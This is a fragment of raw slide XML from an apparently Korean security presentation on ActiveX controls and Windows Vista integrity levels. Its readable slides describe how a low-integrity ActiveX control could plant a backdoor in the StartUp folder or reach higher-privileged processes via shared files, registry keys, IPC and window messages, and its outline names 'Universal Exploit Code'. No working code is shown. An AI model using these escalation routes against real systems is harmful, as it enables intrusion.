            <a:ext cx="3051402" cy="408623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altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Medium integrity process</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr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203428" y="5726128"/>
            <a:ext cx="1785950" cy="340519"/>
          </a:xfrm>
          <a:prstGeom prst="round2Diag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ko-KR" sz="1400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Configuration file</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127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33873E-6 2.36505E-6 L -4.33873E-6 -0.27221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3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57726E-7 4.38983E-7 C 0.08164 0.02563 0.16343 0.05125 0.20885 0.08717 C 0.25427 0.12308 0.26199 0.19429 0.27282 0.21592 " pathEditMode="relative" ptsTypes="aaA">
                                      <p:cBhvr>
                                        <p:cTn id="1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81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81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81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42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66884E-6 -1.90086E-6 L 0.0239 0.19702 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="3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" y="9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481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481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481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6077E-6 4.44444E-6 L 0.27223 4.44444E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="4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6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4813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4813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4813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50527E-7 -1.5963E-7 C 0.03459 -0.04159 0.06917 -0.08318 0.118 -0.11174 C 0.16684 -0.14031 0.26392 -0.16152 0.29331 -0.17139 " pathEditMode="relative" ptsTypes="aaA">
                                      <p:cBhvr>
                                        <p:cTn id="5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1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="61" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="5000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933 -0.17139 C 0.2933 -0.17118 0.2933 -0.08255 0.2933 0.0063 " pathEditMode="relative" rAng="0" ptsTypes="aA">
                                      <p:cBhvr>
                                        <p:cTn id="6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8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2" grpId="1" animBg="1"/>
      <p:bldP spid="13" grpId="0" animBg="1"/>
      <p:bldP spid="13" grpId="1" animBg="1"/>
      <p:bldP spid="13" grpId="2" animBg="1"/>
      <p:bldP spid="13" grpId="3" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="1" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="1" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="1" animBg="1"/>
      <p:bldP spid="16" grpId="2" animBg="1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US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Bad guys may create a backdoor program in the user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>StartUp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> folder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489048" y="6066647"/>
            <a:ext cx="1048360" cy="408623"/>
          </a:xfrm>
          <a:prstGeom prst="round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altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>ActiveX</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="75000"/>
                </a:schemeClr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233911F-8A1F-4C8B-AEEA-148662EADB72}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4813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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Misused Scenario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274734" y="6566713"/>
            <a:ext cx="7858180" cy="408623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altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Vista</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="18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346172" y="6066647"/>
            <a:ext cx="3214710" cy="408623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altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Low integrity folder</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="18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632320" y="6066647"/>
            <a:ext cx="3286148" cy="408623"/>
          </a:xfrm>
          <a:prstGeom prst="round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altLang="ko-KR" sz="1800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>StartUp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> Folder(medium)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="18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061344" y="6066647"/>
            <a:ext cx="428628" cy="408623"/>
          </a:xfrm>
          <a:prstGeom prst="round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altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="18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632848" y="6066647"/>
            <a:ext cx="214314" cy="387191"/>
          </a:xfrm>
          <a:prstGeom prst="round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altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="18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990038" y="6066647"/>
            <a:ext cx="71438" cy="387191"/>
          </a:xfrm>
          <a:prstGeom prst="round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endParaRPr lang="ko-KR" altLang="en-US" sz="18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989114" y="4280697"/>
            <a:ext cx="1571636" cy="340519"/>
          </a:xfrm>
          <a:prstGeom prst="round2Diag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ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Backdoor file</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr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846238" y="3994945"/>
            <a:ext cx="3051402" cy="408623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altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Medium integrity process</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr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274866" y="5726128"/>
            <a:ext cx="1571636" cy="340519"/>
          </a:xfrm>
          <a:prstGeom prst="round2Diag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ko-KR" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Backdoor file</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127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33873E-6 2.36505E-6 L -4.33873E-6 -0.27221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3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66884E-6 -1.90086E-6 L 0.0239 0.19702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" y="9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6077E-6 4.44444E-6 L 0.27223 4.44444E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="2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6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50527E-7 -1.5963E-7 C 0.03459 -0.04159 0.06917 -0.08318 0.118 -0.11174 C 0.16684 -0.14031 0.26392 -0.16152 0.29331 -0.17139 " pathEditMode="relative" ptsTypes="aaA">
                                      <p:cBhvr>
                                        <p:cTn id="3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"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="5000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933 -0.17139 C 0.2933 -0.17118 0.2933 -0.08255 0.2933 0.0063 " pathEditMode="relative" rAng="0" ptsTypes="aA">
                                      <p:cBhvr>
                                        <p:cTn id="3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8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2" grpId="1" animBg="1"/>
      <p:bldP spid="13" grpId="1" animBg="1"/>
      <p:bldP spid="13" grpId="2" animBg="1"/>
      <p:bldP spid="13" grpId="3" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="1" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="1" animBg="1"/>
      <p:bldP spid="16" grpId="2" animBg="1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233911F-8A1F-4C8B-AEEA-148662EADB72}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4813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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Potentially Vulnerable Scenarios</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4813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ko-KR" dirty="0" smtClean="0"/>
              <a:t>ActiveX control is executed with low integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>However, an ActiveX control can do any higher-privileged job by using a higher-privileged process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>ActiveX control can communicate with a higher-privileged process by</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Sharing files and registry keys with lower integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>IPC(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Interprocess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> Communication)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Sending messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Sending private messages, defined as WM_USER + X(an integer value)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Elevated application’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>ChangeWindowMessageFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>() call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슬라이드 번호 개체 틀 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="7237413"/>
            <a:ext cx="2493963" cy="32385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1306" tIns="45654" rIns="91306" bIns="45654"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1AEC33EE-C8B3-4E21-A6BC-ED91019F3919}" type="slidenum">
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:pPr latinLnBrk="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1600" b="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49155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ko-KR" dirty="0" smtClean="0"/>
              <a:t>5 Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49156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/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49157" name="AutoShape 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="1955800"/>
            <a:ext cx="5446712" cy="441325"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449337" tIns="45654" rIns="91306" bIns="45654" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Introduction to ActiveX Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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49158" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="3898900"/>
            <a:ext cx="5446712" cy="439738"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>DBCS and Universal Exploit Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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49159" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="4835525"/>
            <a:ext cx="5446712" cy="439738"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Windows Vista and ActiveX Control </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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859142" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="1811338"/>
            <a:ext cx="681037" cy="642937"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="859144" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="3743325"/>
            <a:ext cx="681037" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="859145" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="4668838"/>
            <a:ext cx="681037" cy="642937"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49163" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2397125" y="5843588"/>
            <a:ext cx="6407150" cy="517525"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="635B37"/>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="D7C577"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="635B37"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Reference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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859149" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1889125" y="5688013"/>
            <a:ext cx="801688" cy="757237"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D7C577"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2700" dirty="0">
